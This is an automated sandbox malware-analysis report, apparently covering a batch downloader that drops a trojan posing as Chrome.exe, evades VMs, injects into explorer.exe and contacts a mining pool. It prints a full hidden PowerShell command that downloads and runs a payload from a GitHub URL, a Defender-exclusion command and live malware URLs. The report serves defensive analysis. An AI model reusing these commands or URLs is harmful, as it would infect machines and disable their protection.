Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4250	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5605	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3920	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 410	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6400	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3370	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7265
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2363

Source: C:\ProgramData\Chrome.exe

Dropped PE file which has not been started: C:\Windows\Temp\lhaqmlexwhjs.sys

Jump to dropped file

Source: C:\Windows\System32\conhost.exe

API coverage: 0.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556	Thread sleep count: 4250 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1716	Thread sleep count: 5605 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1944	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068	Thread sleep count: 3920 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068	Thread sleep count: 410 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152	Thread sleep count: 6400 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152	Thread sleep count: 3370 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1756	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844	Thread sleep count: 7265 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656	Thread sleep count: 2363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\explorer.exe TID: 2296	Thread sleep count: 89 > 30
Source: C:\Windows\explorer.exe TID: 2296	Thread sleep count: 38 > 30

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000003.00000002.1567798861.000002576F5F2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\conhost.exe

Code function: 47_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,

47_2_0000000140001160

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 95.179.241.203 443
Source: C:\Windows\explorer.exe	Network Connect: 104.20.4.235 443

Yara detected Powershell download and execute

Source: Yara match	File source: eshkere.bat, type: SAMPLE
Source: Yara match	File source: amsi64_4872.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\ProgramData\Chrome.exe	Memory written: PID: 4680 base: 140000000 value: 4D	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Memory written: PID: 4680 base: 140001000 value: NU	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Memory written: PID: 4680 base: 140674000 value: DF	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Memory written: PID: 4680 base: 140847000 value: 00	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Memory written: PID: 4680 base: 6BC010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\Chrome.exe	Thread register set: target process: 1404			Jump to behavior
Source: C:\ProgramData\Chrome.exe	Thread register set: target process: 4680			Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1348.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1348.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 File and Directory Permissions Modification	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Windows Service	1 Disable or Modify Tools	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	11 Windows Service	311 Process Injection	1 Obfuscated Files or Information	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eshkere.bat	16%	ReversingLabs	Script-BAT.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Chrome.exe	76%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1348.exe	76%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Temp\lhaqmlexwhjs.sys	5%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.121.4	true	true	unknown
raw.githubusercontent.com	185.199.109.133	true	false	unknown
pool.hashvault.pro	95.179.241.203	true	true	unknown
pastebin.com	104.20.4.235	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe	true	unknown
https://pastebin.com/raw/FBXiGyZ9	true	unknown
https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/fruktoozik/qnfr8P	wusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
